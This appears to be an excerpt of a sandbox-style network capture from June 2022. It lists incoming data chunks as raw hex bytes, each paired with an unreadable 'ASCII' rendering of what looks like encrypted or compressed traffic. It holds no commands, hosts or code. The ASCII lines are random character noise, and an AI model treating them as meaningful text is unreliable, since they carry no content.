                                2022-06-26 07:43:17 UTC756INData Raw: 62 34 71 ee d1 8f e9 8e 05 6e 12 41 57 67 df b1 60 d2 2c ad 8d c9 94 ad 9d dc 2e 3a e4 8b df 52 b0 d5 57 18 85 4f 94 c3 89 81 57 ee e2 43 8a 01 21 cb bb 34 b3 39 9e 1a 52 fc 0a 69 12 f6 5b ec 01 e2 99 a1 42 da ea 57 e4 f4 9a b9 5a 2c 7d 3f 6d 22 8d 0b 5e 83 44 fd e3 47 6f ae 65 a3 24 8f fe 51 04 78 77 64 33 2e 81 48 d0 8d ee fd 53 2a 4a 41 e7 7a 01 f0 de 9b 6a 17 18 6d 3c 75 6d 3a ec b6 99 1f 49 00 23 e6 69 b1 bc 42 27 ec fe c2 b8 c8 7f 9c 39 e2 7b 66 f8 c7 60 8b 01 02 2a f4 11 d3 a8 e5 81 eb e9 47 be 6c ba a9 2a 8c 1a e2 60 11 04 a2 3b 69 39 4d d1 e3 70 3b 8e d7 78 67 e5 c5 f3 69 65 48 e2 ec 23 f2 59 93 bd 7b 07 c2 75 48 d4 ca 3c 72 b9 2b fb ca 34 e4 c9 f2 e9 4b a0 ee 1d 0b b9 37 c3 ec 2d 9a fc a3 12 fd a8 16 4c 4e d0 3e 36 3e 6a 85 3a 4e 7b 45 03 4b aa
                                Data Ascii: b4qnAWg`,.:RWOWC!49Ri[BWZ,}?m"^DGoe$Qxwd3.HS*JAzjm<um:I#iB'9{f`*Gl*`;i9Mp;xgieH#Y{uH<r+4K7-LN>6>j:N{EK
                                2022-06-26 07:43:17 UTC760INData Raw: e8 64 21 81 90 ce 85 4a 79 4f 53 c9 ea 03 40 6f b6 c1 db 05 be a7 0c 50 f8 fe 68 1d 32 28 fc eb 46 68 39 75 0e 60 6b a7 6f 57 e8 f3 a9 1c 24 05 7b 10 30 d3 c7 87 90 b3 27 22 43 fc 4a b5 b3 f1 a4 b0 f6 93 5a 3a f6 e7 5a 0c 3e 5e 11 78 f0 8a 20 d6 b5 6c 43 af cd d7 5c 0e 08 1c 17 9c 3b ca 59 7f 4d 6d 12 d3 25 59 6f c3 6d 48 92 d2 8b eb 8c 7d d0 1f 6e 81 af 15 d9 f5 23 0b a7 af 81 28 f5 ea 24 0f 30 38 1f 14 8a 6a e8 d2 f4 60 74 85 dd 38 2e b2 a8 df d7 ee d3 ad ac 9c 67 1d 24 bb eb 8f 35 71 d9 d0 31 10 0d c3 34 57 54 36 e5 67 af 91 5e 1e 61 4c 2e fe 95 5c 3a 32 f5 8a d3 8c 83 7d e8 50 a2 04 02 94 66 f3 05 20 18 84 58 2f 9b 87 1b 58 62 fc 72 91 cf 2f 4c 6f cc 77 b4 62 62 4d 4d 3c fc 49 88 5e 83 92 b2 c7 80 44 cf 5e ec 02 ce 74 0d 27 29 76 4d d7 07 be 45 23 fc
                                Data Ascii: d!JyOS@oPh2(Fh9u`koW${0'"CJZ:Z>^x lC\;YMm%YomH}n#($08j`t8.g$5q14WT6g^aL.\:2}Pf X/Xbr/LowbbMM<I^D^t')vME#
                                2022-06-26 07:43:17 UTC764INData Raw: 67 ef 43 5b 46 45 59 48 27 19 fb a7 c8 3e 02 dd 7c 96 2a 86 5c fc 9f f1 ac fb 32 48 fd 6f f1 8f 0e 4e cf 9d 06 ab 74 80 3c b8 12 14 17 ab 26 0c db de 86 bc 66 11 cd 7b e5 83 ff e6 b0 57 2a 2e 59 66 0f 89 79 1b 1e cb 53 1e 45 28 e4 3e f2 2f 13 4a 6b 75 6c ec 44 88 e7 bd 2e 27 e8 e3 27 01 70 fb 57 a1 49 75 67 35 9d 23 7b ad ea 69 45 69 ce 82 b9 3b c3 2e 18 7f 9e f7 2e 87 3d 3c 87 e6 6e 9f 11 27 59 73 01 ae 58 f3 9d 9b e9 05 06 16 d2 f7 c6 14 8e bb 0c d9 39 76 0d ed 42 5a 23 d7 68 b5 4b 65 6b ce e5 ae fe 10 db ca 9a f2 54 a9 e4 47 a9 18 8c ed cc 95 f4 9e 35 35 9c 19 69 e1 74 a2 87 71 9a 3c 2a c7 28 80 43 8c 2b a3 db 1e f1 23 67 22 2d be 5c b1 db 58 b9 28 6e 52 ec fc 36 57 2b 89 3c 95 44 ff a8 ef 42 8e 1a ee a0 52 28 8d f3 c5 de a0 b7 a2 d9 1b 5e 8b 8a bd b5
                                Data Ascii: gC[FEYH'>|*\2HoNt<&f{W*.YfySE(>/JkulD.''pWIug5#{iEi;..=<n'YsX9vBZ#hKekTG55itq<*(C+#g"-\X(nR6W+<DBR(^
                                2022-06-26 07:43:17 UTC767INData Raw: bb 8f a0 bf 0f b5 5d e1 01 30 8c 8d 5f 28 29 03 97 5f 6a 03 bd e6 f7 5a da cc 91 5a 8f c9 2e 46 f0 3d ee 84 4b 32 eb 96 9f 92 41 81 ec 14 32 fd 7a 38 49 41 f6 57 65 16 2a 3d 5e 6d 16 84 b2 99 4f f5 37 88 5c f8 62 07 a9 49 a2 75 81 04 f0 ae 0f b1 cf 9e 06 4b 63 b3 93 7b 10 5a 8e ad 32 a3 1b 78 c9 84 b6 53 1a d6 31 43 19 8b 18 7e c9 ff 0e b7 96 fd 66 f6 2a a9 5a 99 5c 24 2e 66 53 4a 03 e1 95 e4 97 0f be 43 3a 9c cf 32 e0 7f a8 33 e6 65 6d 11 dc 5f 98 74 2f 92 7a 70 00 7c cb 95 bf b0 d8 ce 75 a8 7e fa 61 3c c0 a3 9e 24 90 7d 83 98 9e ff 1a 1f 46 62 17 18 14 d1 32 92 79 27 ff bf 57 73 28 f6 89 93 d3 dc b7 51 26 00 a4 d6 16 d8 21 bb 8c 81 d0 fd 16 1a e1 f0 17 bf 28 b1 b7 7d e8 73 c2 f3 a3 56 01 d6 e5 31 b7 90 a0 ca 30 58 9e 7c f9 02 c1 f1 42 8a ab 7b 12 b1 bb
                                Data Ascii: ]0_()_jZZ.F=K2A2z8IAWe*=^mO7\bIuKc{Z2xS1C~f*Z\$.fSJC:23em_t/zp|u~a<$}Fb2y'Ws(Q&!(}sV10X|B{
                                2022-06-26 07:43:17 UTC771INData Raw: 3b 50 1f 78 a2 b5 c0 3c 5e fd d5 8a bc 01 b7 74 f9 78 05 7d 0c 5b 94 70 33 d7 65 d4 8a 97 38 a0 19 a0 63 a2 b6 92 bc 55 00 de d6 b1 d7 5a 03 28 e5 95 c9 2b 18 26 c3 67 9a d3 ef f3 07 57 27 63 d0 ba 1e 71 2e 00 d1 60 4c fc 20 80 8e 33 54 d3 79 cc f6 fb 77 1f f4 2f 79 4c 09 59 22 b3 bb 75 1b a3 62 11 b4 96 96 d0 3c ed fe f1 da cf 08 5a 87 50 67 44 4e 77 b8 7e 4c c5 ee 20 82 72 ed 77 dd a9 4d f0 e9 ec 7e d2 d9 15 b2 75 26 ab d4 31 14 2b e5 f2 67 2c e5 33 5f 4a b3 7c e1 71 76 58 03 1b 8f 63 57 e5 4b d1 6e fe 84 a6 00 f4 55 b9 2d b1 25 fb 09 b1 6c 1a 6f 61 8c 2b 75 b3 c1 b1 e2 eb fa 86 0e d1 38 c9 10 c6 96 36 ed 43 0b 8e bf 11 76 15 20 33 d3 5a d2 a6 a1 27 86 63 84 08 2e 16 12 fc 47 4f 87 4d 37 d9 ed c2 ed 16 69 3c f5 51 a3 b9 fd 63 36 ee 29 3d 94 0b b7 ec f6
                                Data Ascii: ;Px<^tx}[p3e8cUZ(+&gW'cq.`L 3Tyw/yLY"ub<ZPgDNw~L rwM~u&1+g,3_J|qvXcWKnU-%loa+u86Cv 3Z'c.GOM7i<Qc6)=
                                2022-06-26 07:43:17 UTC775INData Raw: 91 29 62 99 3a 85 d9 c6 48 45 62 c2 a8 bc ac fc 28 c7 82 55 2f f3 c4 4b 10 94 df ef 25 fd d6 48 07 84 a3 d8 60 35 f4 48 6a 21 b4 d8 87 bf fb 1a 6c 55 59 e3 02 ee c6 87 7f 16 97 c4 7f 92 7a ea a9 a2 ad 50 6d 5d 79 32 81 86 e7 71 84 e7 24 0b 3c ad 3a 27 41 fc 69 ac 30 fa 7e a3 2e 0b 81 2e b5 f8 9c e1 71 4b 80 14 55 ea a5 a8 09 4b a4 4e 37 18 65 e7 db 7e de 62 1c 0b 16 3b 9e ae 85 65 8f 06 89 72 c8 3a 30 f5 9a 8a 8e 5c 0e ea 34 44 4c e5 9d a8 b4 f5 13 69 65 e3 e7 02 b9 99 99 31 12 22 96 ea 8e ef 00 ac cf f4 15 08 cb 11 e5 17 dc 52 18 0c 78 00 d7 bf 44 a0 50 e2 39 88 d8 ef 00 8d 22 01 02 00 b1 f2 b8 11 9f d9 7b 36 c1 74 5a 56 f9 65 ca a5 da d5 be 81 a1 20 ae 0a 19 41 ec 6a fb ec 48 ad c8 0a fe 48 cf fb e0 36 4b c9 8e 8b 52 84 e2 5a 93 b7 5c 93 ef e2 9b a8 b5
                                Data Ascii: )b:HEb(U/K%H`5Hj!lUYzPm]y2q$<:'Ai0~..qKUKN7e~b;er:0\4DLie1"RxDP9"{6tZVe AjHH6KRZ\
                                2022-06-26 07:43:17 UTC779INData Raw: d2 39 1c 13 fd d6 f6 e1 e5 3e f6 14 86 48 d9 3d 10 bb b4 4d bd 13 38 be 17 61 97 f9 81 49 b9 fb 67 37 85 62 3f 07 c7 68 53 cc 54 a9 40 a3 db b8 11 30 61 54 ef 89 93 3e 64 fc ea 0c 4a 80 c0 bd 08 3c 75 82 c9 7f 68 7a bc 84 64 d0 ce ba d8 86 6e 25 ed 89 1a 85 35 61 d3 c6 ec 7d 71 5c 0d 9c 0e 11 6f 8b 2f f0 ee 71 95 35 0b b5 fd 4a 1b 42 f4 3e a9 77 5c 33 d1 96 51 89 83 22 64 2f 9b cf e3 bb dd fb c6 01 68 df 9a 52 a2 16 26 ff ef 56 05 86 62 da f9 9b c3 e6 e8 e1 0e d8 15 99 8d fb d1 79 ad 40 0e b9 bb 42 47 46 fd a6 7b f2 50 e9 60 8b a7 f1 6d a0 bb 96 8a 24 1b 79 2b 4b 7a e8 4d 83 b2 32 b6 44 9b ad 00 b6 bc ca 0a be 37 59 f6 55 6d 65 db 99 6e 89 c3 26 fc 06 36 fc 6b 53 55 cc de e2 82 2d 87 47 cd 4d 88 5c 20 48 2a 90 a7 40 7f 52 64 6b 90 ba 35 56 56 14 3c 44 52
                                Data Ascii: 9>H=M8aIg7b?hST@0aT>dJ<uhzdn%5a}q\o/q5JB>w\3Q"d/hR&Vby@BGF{P`m$y+KzM2D7YUmen&6kSU-GM\ H*@Rdk5VV<DR
                                2022-06-26 07:43:17 UTC783INData Raw: 14 8a f6 92 5b 62 7d 46 3c d6 d1 8e 14 92 c1 8e e8 18 48 f3 75 4e 19 67 33 b4 4b b4 92 29 90 e5 92 59 30 c4 28 3d 8f 87 2c 2d 3c 54 79 25 64 c4 2a a1 44 6b dd d6 38 60 b7 e1 9f f1 75 01 6d 9e 8f d9 1f 21 c5 ca 0f 3c 26 5c 0f 50 74 61 38 8a 8e 61 f1 c3 fb cc ff 16 44 7c 6f 3a 8a e6 41 d0 18 f2 ef 2c d7 e3 b0 51 65 b0 d6 00 13 3b 48 27 c9 18 ab 84 5d da 78 a5 f5 c6 4b ec 7c 76 39 0d 8e 9f 15 25 96 3c da 08 0f e8 67 73 51 ff 63 07 64 12 75 6c d0 c0 87 d3 05 27 ff 42 0b a9 57 44 c9 c6 47 29 84 97 0e 26 67 77 e6 2a 7a 58 3c f6 c4 2d 18 7b 4c d9 28 c9 e7 21 b9 40 0b 4b 00 81 4f ad e7 f9 0b 85 2b 95 92 30 95 b6 ad a3 43 10 b6 37 f5 4f 6f c9 c4 8f 71 fa 84 07 18 94 ed 84 84 a7 49 64 30 f4 2d a2 c5 1e 76 fb 6e 45 d8 16 aa 25 4e c7 24 5e 70 42 e1 f3 57 da e3 43 5c
                                Data Ascii: [b}F<HuNg3K)Y0(=,-<Ty%d*Dk8`um!<&\Pta8aD|o:A,Qe;H']xK|v9%<gsQcdul'BWDG)&gw*zX<-{L(!@KO+0C7OoqId0-vnE%N$^pBWC\
                                2022-06-26 07:43:17 UTC788INData Raw: af ee a7 01 73 1a 2e 59 61 c5 f4 20 5d 13 23 e8 74 9e 0b ac 6f 66 41 62 45 ee 3b c8 4b 9b 7b c6 a3 61 90 62 a5 8d ba e2 44 76 12 c4 f9 ef 8b 2f 34 39 dc a4 7a 90 8a b5 42 6e 97 0b 4b 6c 53 38 12 b5 47 37 b3 59 e4 a4 f4 46 61 00 32 3d f2 75 de 00 cf 4f ec 68 88 e6 de 00 1f 42 71 a5 97 b7 4a dc 76 3c db 3d 37 d4 56 23 18 86 61 10 3f 3c a4 86 0b c0 c4 9e 0c ec fc e3 ac b7 85 5a f1 d3 8f 60 d2 c1 87 f7 5e ce e7 9a 6f 2a 57 24 64 58 9c eb 9b 4a c0 29 51 a7 73 0a a8 36 42 11 50 c6 28 b5 ae 76 d8 52 34 47 3c fe c6 31 e6 76 b2 5a 29 41 6a 01 22 18 40 96 20 98 35 66 17 dc a0 ca 1e 2f 49 66 fb 2a 21 41 b9 f8 26 a1 8f 74 f0 1f e0 2d 9d 42 c7 05 d1 61 de dd 4c e4 42 19 76 1c a6 a1 ea 9a 24 51 4c 61 ca 2e 7c 7d 45 10 ed 11 1f dc 66 e8 96 52 02 8c b7 ff 8c ba 98 19 7c
                                Data Ascii: s.Ya ]#tofAbE;K{abDv/49zBnKlS8G7YFa2=uOhBqJv<=7V#a?<Z`^o*W$dXJ)Qs6BP(vR4G<1vZ)Aj"@ 5f/If*!A&t-BaLBv$QLa.|}EfR|
                                2022-06-26 07:43:17 UTC792INData Raw: 5e 55 aa bf b4 ca 34 b4 05 d1 50 0c d2 fc ef db e5 38 38 61 37 e9 d6 35 fb 59 74 4d ba 68 38 f9 69 db 89 f5 1b 05 18 15 2d c7 e6 68 fb 06 4a 0c 1b 4e d0 df 82 3b 81 80 c8 a9 b2 49 87 c1 76 73 f0 9c c3 2f b2 f8 e0 5c 22 d6 1b 0b 88 55 6a 55 2d a3 3a 82 6e d4 18 df 87 66 4d 99 d2 5e be 58 f4 fb cf 70 98 e2 4c 2f 51 0d 57 55 09 0a 6d ff df 04 64 af a8 34 d2 d8 e0 66 8c 6c ac dd a2 24 9d ea 02 5f 1b 84 b5 85 c4 e4 e6 6b 24 26 dd 54 c2 52 c7 c4 0b 77 4c 8e 09 70 b2 b6 05 be 20 6e 79 f2 b7 ab 66 2a 1b 5b 45 95 07 fb 38 b4 ef 40 38 f1 2e 39 eb 21 66 0d 99 87 b2 b4 fc 00 d5 b5 f0 c7 8e d5 f5 9c 58 a2 cd 9c 76 67 30 12 10 47 02 5d 10 f0 e5 9d 2d fa 61 c8 83 52 06 8d d3 3f 1c 90 b6 c3 41 6e a5 c7 f3 28 f3 4c 15 b4 90 0e ca ae c4 5e 1a d6 38 2f 74 7d 7a 79 ca 04 9b
                                Data Ascii: ^U4P88a75YtMh8i-hJN;Ivs/\"UjU-:nfM^XpL/QWUmd4fl$_k$&TRwLp nyf*[E8@8.9!fXvg0G]-aR?An(L^8/t}zy
                                2022-06-26 07:43:17 UTC796INData Raw: 63 5c 5e e0 04 d4 a9 c7 95 e2 96 21 17 4b 1f 0a a0 5f c4 68 6a a9 49 d5 4f c4 05 fa e9 49 22 04 2b f5 cb cd 1e a2 f1 84 a8 28 19 8b 08 ef 7c 5c 02 87 d6 4d 3b 77 75 44 a2 2a e5 79 7c ed 7a 58 f2 5b ce 6a 79 d1 15 b0 97 9a 66 ac 0f 38 a5 b4 de 6f 79 95 87 5a f8 90 e9 c0 22 91 b2 85 31 1a 8e 9b c8 dc 43 52 cc e0 45 ed 61 6c 6c a3 e4 f5 63 a2 99 c4 d5 85 a2 55 cc 26 51 89 61 f0 52 46 57 4d 24 30 2d 48 41 cb ba 80 6a a2 56 07 4f 67 b4 9b a6 77 5a 96 fd ce 9e 31 2b 25 0f ed 02 99 5b f6 09 54 61 3a 34 c3 33 6f 98 ae 46 3e 92 3d 02 e3 e2 ef fa a2 21 77 05 ba 49 b9 7b 19 37 7a 8e 87 e3 6e c0 f4 5d 7c d9 aa 0d 1c 3e 3d ce 3d 39 bf ca 82 9b aa 23 c7 d4 16 e3 57 c8 c1 be 77 8d f2 77 4f c8 18 4a b6 5f 70 4a c2 61 ce 0e 3e 35 da 0c ee 92 f2 25 48 16 85 ba 78 00 e0 da
                                Data Ascii: c\^!K_hjIOI"+(|\M;wuD*y|zX[jyf8oyZ"1CREallcU&QaRFWM$0-HAjVOgwZ1+%[Ta:43oF>=!wI{7zn]|>==9#WwwOJ_pJa>5%Hx
                                2022-06-26 07:43:17 UTC799INData Raw: c0 6a 5f 6c f4 7f 96 38 c7 b9 77 bd 8d 03 cb d5 b5 bc d6 00 ae e0 b3 c1 95 81 b3 ef ae 6b ff 73 4c 89 ac e6 7b c0 5d 1f b4 46 a2 ed 03 fe f4 26 9e 03 f6 ca 73 b6 f9 04 f1 35 64 b7 c3 68 0d 0a b1 90 c2 63 36 29 4d 31 7c 05 0a c3 a6 3b 47 e8 59 1e fd b4 e8 23 48 94 d2 c6 be 74 68 36 b9 28 7c fc 14 30 53 92 11 c3 b9 2f 9e 91 0c e0 fd df 69 d4 55 d7 19 9f e1 99 6b 69 59 50 8b 12 f5 23 cc e6 d5 a2 91 5f 62 d0 b8 52 ba 10 b3 88 ee 3f b0 f2 55 e0 93 4d 2f fc 5c 33 98 29 38 76 e5 0c 80 1c a2 90 15 a6 d4 c0 d3 d6 a2 54 39 ed e3 ff 26 2e c3 e3 41 a5 68 cc ea 66 e1 d1 c8 52 76 19 f8 26 c0 fc 22 ac ce 3d 13 bd d3 31 04 bb 0c f4 f3 c3 34 84 12 1a cf 42 a5 99 01 89 ec c0 bd 67 c4 6d 83 c1 3f 9c 36 7e f8 0d 50 ff d8 a1 4c 62 66 54 d0 1e 47 c7 80 8d 83 78 82 51 ff a6 de
                                Data Ascii: j_l8wksL{]F&s5dhc6)M1|;GY#Hth6(|0S/iUkiYP#_bR?UM/\3)8vT9&.AhfRv&"=14Bgm?6~PLbfTGxQ
                                2022-06-26 07:43:17 UTC803INData Raw: 27 6e 93 54 d4 30 ac 64 c7 ca 2e 58 c5 19 3e ca b6 d4 71 f7 89 de ef 13 52 5c dc 4f 3d 8a 53 e9 04 f5 9e be 71 7f 24 de 47 73 1b 1f 5c 1a cc ba 30 fa 78 dc 7c b2 9c 3d 36 11 d8 22 e2 7e 3f 47 b9 68 80 b5 9a 85 8b b8 d1 e2 3b 24 28 68 d9 d1 c8 a0 64 5b 0d f2 61 f9 18 d0 cb 60 44 b6 2b b8 d9 d0 17 c5 e2 b9 db 77 17 9b 2f f2 27 3f 02 e7 ca b5 21 11 6a 61 cb f8 54 bc 2a 61 ca b2 68 02 8f 39 34 a0 11 6a 47 64 4c 72 b3 3f 6d cc 00 0c a8 34 5c 6b 47 55 ee 9d c7 5e a3 73 86 82 20 a6 ba 6b 1c bd 6d d0 6d a1 10 49 f3 63 ef 40 f9 67 7e 44 6b f1 9d 66 d8 39 8b 2c 8d 06 64 de c5 4d a1 ae d0 1d 4c e8 be 69 c4 7e 88 de 43 fe a0 90 e0 fc d4 eb fb 18 e4 f3 69 a2 2a a4 61 8d cc 31 22 c2 24 19 05 22 d7 c1 7e c1 77 10 43 fc 9e 3c e2 b7 d0 22 32 63 51 08 38 58 4e 50 c2 02 3c
                                Data Ascii: 'nT0d.X>qR\O=Sq$Gs\0x|=6"~?Gh;$(hd[a`D+w/'?!jaT*ah94jGdLr?m4\kGU^s kmmIc@g~Dkf9,dMLi~Ci*a1"$"~wC<"2cQ8XNP<
                                2022-06-26 07:43:17 UTC807INData Raw: 30 32 c8 dc 5e 60 7a ae 30 b8 de aa b9 5a 39 24 00 66 08 54 c8 2c 3c 41 42 f0 5d fa 0c 1b 13 ad ff ec 72 d9 8d bd b8 47 da 20 8d f4 5d e7 82 ad b5 74 7d 1f 2d 0f 82 a3 08 ea 97 c2 9f 23 92 4b 4c 06 4c 4f 53 6a 32 94 90 a4 e7 2f b3 21 51 69 e5 a3 08 9e df a0 8a 52 85 9f a7 12 e2 07 20 4f 8c 16 15 9d c0 19 64 50 1c 6f d1 56 1a 77 cc a4 58 c2 8a 6b ca cf 43 2d 31 0d 56 ab f3 b4 e5 a9 28 dd 62 20 2b 49 12 c2 80 d6 86 9a b6 95 9c d1 98 8a a8 13 0d aa fc e6 32 ff 12 cd 6a db a4 d2 71 52 87 f8 54 b3 42 95 fd a7 39 e8 13 42 6e a5 f8 0c 82 0c 2d 75 6e af 12 9c c8 bc 03 71 b5 e8 47 61 b6 3d e6 ac 10 52 65 cd 57 23 94 18 6a 27 c4 bc 48 7d 5b 6d 1d 19 2a 0c 29 d8 7d 1f 1d eb 8b 94 e3 df d8 d4 73 8b b8 c8 21 d0 75 26 b8 ed 96 a0 16 8b ac 7b 82 1b 16 f4 b2 10 0f c4 d3
                                Data Ascii: 02^`z0Z9$fT,<AB]rG ]t}-#KLLOSj2/!QiR OdPoVwXkC-1V(b +I2jqRTB9Bn-unqGa=ReW#j'H}[m*)}s!u&{
                                2022-06-26 07:43:17 UTC811INData Raw: eb 6d 09 d5 0d 5f 06 74 6a 69 d7 f7 dc 3f c4 bb 2b bb 7a 08 06 35 51 8e 37 b8 4b 6c 3a f9 6b fa 75 82 f8 8c 25 7d 5e ff a5 50 ab f6 0d 5e 89 f0 c4 59 34 17 76 78 d2 90 57 8f 0b ca 09 c2 5b 16 13 74 5f b2 3b 07 66 d8 61 e3 4b ac 00 c8 a0 78 f9 fb 8c f0 cb 82 8c 4b 33 a4 f0 b4 2a 7f 69 f3 8d 89 03 3f 20 e0 2a a7 f7 1a f4 df 45 2c 58 1d 6e 48 1e 7e c9 c6 72 6e c1 85 04 59 8d 4c f2 c5 98 fa 52 e2 f2 ef fe 01 b7 e1 28 9f 02 10 42 a8 48 8e 11 13 2d 0a 1c ee 27 64 6b 47 2c e4 8a bb 54 3c 1e c3 1e ee 01 19 31 09 cc 6a f5 e5 3b a1 44 7e 38 0b 5a 01 27 4e 56 2f a8 3f 68 f1 f7 46 b9 fd 59 2c 8d 9f a9 e1 2c 35 bd 99 4b 39 77 09 e4 e0 aa b2 46 3f 15 a7 19 4b 9c a5 54 93 6c 8e c7 6f 5d bc 30 91 bb 40 1e 6b 88 31 b5 df 1f de 48 0c 06 c5 0b 19 50 2d e1 90 71 d7 5c 9f 2c
                                Data Ascii: m_tji?+z5Q7Kl:ku%}^P^Y4vxW[t_;faKxK3*i? *E,XnH~rnYLR(BH-'dkG,T<1j;D~8Z'NV/?hFY,,5K9wF?KTlo]0@k1HP-q\,
                                2022-06-26 07:43:17 UTC815INData Raw: 6c bc be 43 ba 80 4a 55 1d d0 2c 51 54 a9 84 72 85 1d c6 a9 30 b1 aa 88 f2 7e fe f6 2d 88 d2 f2 7b 12 9e 7a db 6a 01 7f f0 25 89 c3 70 60 bd 4b 9f 2a e1 d5 5c f4 60 39 37 dd f0 da 02 e3 a3 23 89 48 ee a1 04 44 5c 62 c1 38 99 93 05 cc 2a bd c4 db 59 81 95 42 40 0f 04 12 0f cf 83 09 d4 7e 6a 0a 42 d0 18 42 e3 f7 03 fe 94 42 b4 c6 41 d0 b0 47 1c 8c 00 2a d7 7c 71 db 8f ad 3a 64 0a 91 5e 27 6c 12 de 48 56 72 28 ab 8b 0c 62 75 ef 01 51 0a 0c f1 5a d5 86 44 a3 97 f3 60 d3 79 70 8f 0a b5 d6 71 18 a1 a5 52 92 b5 35 0a 37 22 cd 2a 31 29 22 30 de 1a a1 3f b2 b8 e6 51 a2 45 74 bc c1 02 cb e8 96 6b b1 19 0f d6 d8 6d 6d 6b 40 f1 15 7c de e3 31 1b c8 a9 d1 5c ea e8 ad 88 d7 11 f4 69 cd 53 64 93 25 b4 f6 cd 28 ef b7 40 ef be 32 1f d8 53 56 c1 9a ae de bc 4f e0 01 c0 fa
                                Data Ascii: lCJU,QTr0~-{zj%p`K*\`97#HD\b8*YB@~jBBBAG*|q:d^'lHVr(buQZD`ypqR57"*1)"0?QEtkmmk@|1\iSd%(@2SVO
                                2022-06-26 07:43:17 UTC820INData Raw: c6 6d 0c fa 29 c1 70 1b 51 bc 48 f5 81 62 00 28 17 11 89 11 cb 29 6d 0e cd 92 25 bd 66 2a a6 a0 00 5a cd 29 57 7b db 19 25 77 80 17 9a 18 28 14 2c da 24 fd 9b b0 54 a4 09 1e cb 12 f7 bd 41 7c 64 74 3c c9 3d 3b 5c cf ab 90 91 de 54 5d 09 06 34 ea 36 d7 9c 50 c4 4b f0 29 96 e0 ac 4e 6f b4 41 30 10 3d 0d 0d 37 d0 49 8d 85 65 1b 11 8e 8a 98 e0 72 5e 4d d8 dd 4e 50 d1 20 f4 5e 6f 44 09 43 f7 bb 35 48 19 ca 4e cf 69 ef fe e8 0a 22 d4 ca 0c 15 ea c0 b6 73 46 b5 6e 88 18 c8 5f e9 af 85 50 81 dd 7b 11 d9 f0 20 d6 e3 f8 d7 07 62 e7 2d e3 13 fa d4 91 59 2c c6 cd a1 51 d0 49 e9 ca 52 e8 6f 0c a0 82 2b 65 b9 eb f5 0d aa 10 c0 d6 98 ea 73 13 53 a8 33 c7 e5 ae 2a 3c ba 56 62 6c f9 d2 90 a5 e0 4e a5 44 d0 3a f8 15 5a 9d 70 3e c8 5d 12 c6 50 88 3c a1 4a 11 fd d7 8e e4 7b
                                Data Ascii: m)pQHb()m%f*Z)W{%w(,$TA|dt<=;\T]46PK)NoA0=7Ier^MNP ^oDC5HNi"sFn_P{ b-Y,QIRo+esS3*<VblND:Zp>]P<J{
                                2022-06-26 07:43:17 UTC831INData Raw: 10 75 0a 59 57 81 33 0a 5e 71 c5 49 d7 50 03 12 fa d5 95 b4 f3 9f 98 93 39 02 6a af aa 72 87 c6 cb a5 b1 f8 f7 5b 2f 15 e5 7b 4e 1c 7e c0 71 f0 5b 2a b5 ee a5 89 70 99 16 0d cf fb e2 cb ac b1 f1 ad c3 2f fe 2a 1b 8e 4e 03 1e 7b 24 0b 3e e5 11 ce f1 e3 d3 c4 bf 49 c9 74 73 37 69 4a 65 d1 70 87 18 f5 41 98 85 ba d7 1e cc 70 a0 b9 45 79 9d ba 84 76 c3 03 c5 f3 25 53 89 d1 e3 7e cc 28 63 3e 57 27 82 b5 05 19 36 9f ca 6a 22 07 7e 93 ca fe 11 ec 46 46 27 a5 23 4c 66 e9 9d e1 53 2b 6f 93 e3 bd 1d 1b 57 c2 5f 8b 24 bb 45 39 ce f2 44 ce b9 85 ea 9b ab e8 82 8c f5 ed e6 59 dd 92 b3 8d 20 bd b1 0a 4b 6a 63 a3 6d ac 8c e5 d4 70 05 ba db 7b ab 38 57 cc 89 c2 31 76 b7 43 4c 39 bd c5 46 64 9b d6 fc 68 62 4e ee 11 2d 80 6b d7 aa 73 19 83 8d 60 59 68 f9 bb 8d a9 05 63 ec
                                Data Ascii: uYW3^qIP9jr[/{N~q[*p/*N{$>Its7iJepApEyv%S~(c>W'6j"~FF'#LfS+oW_$E9DY Kjcmp{8W1vCL9FdhbN-ks`Yhc
                                2022-06-26 07:43:17 UTC836INData Raw: 31 76 44 1c c2 43 1f 51 2d 76 31 ef 22 c1 34 3d d4 96 16 30 5d 12 54 f1 8e 42 29 4f 8c 0d bc ea 8f fd d5 b8 22 4a 4f 04 c2 84 5d 55 ef 87 06 b8 b5 fa 9c 2e 03 8a 4f 90 04 97 12 aa d0 d6 df 6c d5 e6 0b dc 2b 03 c4 93 1f 74 06 76 07 24 72 7e 50 fc 03 f9 b2 fb b3 a0 40 34 1b 99 8b f1 3b 11 9d 77 f3 86 12 04 77 4f b8 69 ec f4 bd 50 8b 25 c7 40 9f 85 88 fa 12 f3 94 5f d3 07 69 1b 20 38 9f db 15 95 8f 2c 13 42 f5 20 8c bd 54 57 80 7d bd 2d ba e1 3a d7 9b c2 1d bc 5a fb 0b f1 e9 68 38 60 e0 97 36 6a ca 67 45 ec 2b 8f e5 f5 c8 f3 6b b2 30 33 34 ce bd e0 39 e6 5b 30 fa f2 16 46 a2 c9 f9 7d f5 62 31 04 23 72 c3 f5 4c 8b 9b 44 b3 ba d3 5c b1 2d ff 43 a3 6d 77 cd e5 76 af 01 be 72 bf d6 a6 b0 ec ef 74 cd 9f 57 96 5a 7f b3 df 37 ae c3 96 6f 18 fa 6d 3c fd 75 c0 02 f3
                                Data Ascii: 1vDCQ-v1"4=0]TB)O"JO]U.Ol+tv$r~P@4;wwOiP%@_i 8,B TW}-:Zh8`6jgE+k0349[0F}b1#rLD\-CmwvrtWZ7om<u
                                2022-06-26 07:43:17 UTC852INData Raw: 73 bc ae fc a3 a2 31 be ad 92 38 fd 67 a5 e6 72 92 1a 64 35 ea 8c 45 d1 45 a3 e7 1f b9 a9 a6 0a 92 39 d9 0f 91 3c bc e0 00 a6 ca bd e1 72 00 7e 46 5b d9 00 7e b4 70 85 66 a2 c8 72 e9 44 f2 2c 74 51 e2 fe 5c 79 6c 07 ea d4 ab cb d4 3b fe 80 7d 9e 94 37 57 40 a3 40 31 45 45 33 00 f2 2c b1 d1 e8 7b c6 fa 44 53 3d af d2 36 3e 07 76 d6 d2 81 d7 02 74 64 7e 29 0e ca 6f be 57 40 7c c9 21 3c 1d 16 a2 d4 3f 9f dd 70 6f 67 87 6f e3 1c e1 0e de ea 0c 14 1a 97 ed dd 34 66 44 45 92 e6 60 36 63 8b c0 a4 2a e7 2b 7c c2 a0 11 3c 78 67 2e 09 5e 32 2e 96 d6 e5 44 d2 1b 49 51 61 b7 e6 f2 3c 35 47 90 0a c7 5a 98 27 fe b8 57 a5 f6 1f 5c f1 e3 b5 d6 e7 bb 19 61 39 9b ce ff 6b f8 2b af 26 8e c6 db ce f5 6a 50 8b 4e 2c 60 9e e6 a3 